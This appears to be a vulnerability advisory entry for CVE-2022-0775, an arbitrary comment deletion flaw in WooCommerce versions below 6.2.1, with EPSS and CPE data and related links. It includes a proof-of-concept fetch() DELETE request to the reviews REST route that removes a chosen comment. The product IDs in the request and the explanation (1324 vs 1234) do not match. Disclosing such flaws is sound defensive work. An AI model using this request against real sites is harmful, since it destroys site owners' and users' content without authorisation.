Lucene search
Krzysztof ZającWPVDB-ID:B76DBF37-A0A2-48CF-BD85-3EBBC2F394DDHistoryFeb 23, 2022 - 12:00 a.m.
WooCommerce < 6.2.1 - Subscriber+ Arbitrary Comment Deletion
2022-02-2300:00:00
Krzysztof Zając
wpscan.com
17
0.001 Low
EPSS
Percentile
19.2%
The plugin does not have proper authorisation check when deleting reviews, which could allow any authenticated users, such as subscriber to delete arbitrary comment
PoC
Log in as any user (with privileges as low as Subscriber). fetch(“https://127.0.0.1:8001/?rest_route=/wc/v2/products/1324/reviews/2&force;=1”, { “headers”: { “content-type”: “application/x-www-form-urlencoded”, }, “method”: “DELETE”, “credentials”: “include” }); That needs product 1234 to not exist. It will permanently remove comment with ID 2.
| CPE | Name | Operator | Version |
|---|---|---|---|
| woocommerce | lt | 6.2.1 |
Related
osv
osv
CVE-2022-0775
2024-01-16 16:15:09
cvelist
cvelist
CVE-2022-0775 WooCommerce < 6.2.1 - Subscriber+ Arbitrary Comment Deletion
2024-01-16 15:52:36
prion
prion
Design/Logic Flaw
2024-01-16 16:15:00
wpexploit
wpexploit
WooCommerce < 6.2.1 - Subscriber+ Arbitrary Comment Deletion
2022-02-23 00:00:00
cve
cve
CVE-2022-0775
2024-01-16 16:15:09
nvd
nvd
CVE-2022-0775
2024-01-16 16:15:09